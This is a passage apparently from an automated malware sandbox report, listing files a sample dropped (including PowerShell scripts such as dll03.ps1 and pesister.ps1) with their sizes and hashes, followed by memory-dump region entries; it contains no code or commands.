
          67f0b143336d7db7b281ed3de5e877fa87261834

          SHA256

          8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c

          SHA512

          0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca

        • C:\Users\Admin\AppData\Local\Temp\DLL01.txt

          Filesize

          31B

          MD5

          951386ce4b2d0dd2077125fb0d2c5fb2

          SHA1

          2ed5db7ef27b9ca9654c4baaf62498d517d73eca

          SHA256

          612fa030dc132ad86fd042c6d5ec0bc0881d5172c91d1a3ecabc0471fc8200f2

          SHA512

          4dffbbdf2d7ee7b8ed83149814cffe71d85c8fdcccb60f192d5b2e9b1e69bdfcab2b6d8cdee0a0c1e66eb851e27ecead494d2594c84801b6648f4794fe6f0fe5

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b3jiza34.reu.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\dll02.txt

          Filesize

          58KB

          MD5

          1c9a162501d99eeafdec7cef54b38834

          SHA1

          e6f04b12750a692e58e242c228b24dbc1035b8d7

          SHA256

          38d36e31eb84ceda28f3ed70a66563e6bf4da3c2dc3dfa47a5b60633dcc146fb

          SHA512

          9f5c9979f77fed6b3d095ae11d490950ed59cd41b4226e74ee3ce81cca53d56c8e37ba429410aa7eea2aa82c3bf69e0dae4e459f133f93e5c617e6966662d78f

        • C:\Users\Admin\AppData\Local\Temp\dll03.ps1

          Filesize

          888B

          MD5

          3561af8806c5825d85e8b8572d11f4b7

          SHA1

          ed2c4c2d81c11cbc9ab16c545504dcd21a66f057

          SHA256

          1b541fd422e2094c9477bb5cc44bedb4c32027e444b5cb8e0ee22f9d5da5ae49

          SHA512

          bdb2f43a2fa664cd71e29254cbd07f967120ebab582412440f8f88335ca45ba4bd917764c6ef860346f51b999d7e1cae4437bc477ae2bbed69b0a6ce681c4aaf

        • C:\Users\Admin\AppData\Roaming\pesister.ps1

          Filesize

          231B

          MD5

          f3ab1b5ce3c172217a5552713d7cf8bb

          SHA1

          d6fe9fdf07c103dbc111de9f70e6d3a82ebaf098

          SHA256

          76b0abbd36ba303f5195444356380afcac3b4394aec1a9b0e2c5ba68bc9fc1d5

          SHA512

          d7f4675ad52474ef2f83d7cf0acca823e92bb485919ac7c52bef1987f3017ca0870fd2c69c2c24135996e98bd7c3d653f2def758840e045d4e73846a3c324661

        • memory/3808-140-0x0000000000400000-0x0000000000455000-memory.dmp

          Filesize

          340KB

        • memory/3808-144-0x0000000000400000-0x0000000000455000-memory.dmp

          Filesize

          340KB

        • memory/3808-142-0x0000000000400000-0x0000000000455000-memory.dmp

          Filesize

          340KB

        • memory/4376-129-0x00000212B5FE0000-0x00000212B5FEA000-memory.dmp

          Filesize

          40KB

        • memory/5008-37-0x0000015369910000-0x000001536991A000-memory.dmp

          Filesize

          40KB

        • memory/5112-0-0x00007FFA8A943000-0x00007FFA8A945000-memory.dmp

          Filesize

          8KB

        • memory/5112-104-0x00007FFA8A940000-0x00007FFA8B401000-memory.dmp

          Filesize

          10.8MB

        • memory/5112-83-0x00007FFA8A943000-0x00007FFA8A945000-memory.dmp

          Filesize

          8KB

        • memory/5112-12-0x00007FFA8A940000-0x00007FFA8B401000-memory.dmp

          Filesize

          10.8MB

        • memory/5112-11-0x00007FFA8A940000-0x00007FFA8B401000-memory.dmp

          Filesize

          10.8MB

        • memory/5112-117-0x00007FFA8A940000-0x00007FFA8B401000-memory.dmp

          Filesize

          10.8MB

        • memory/5112-1-0x00000264D1DD0000-0x00000264D1DF2000-memory.dmp

          Filesize

          136KB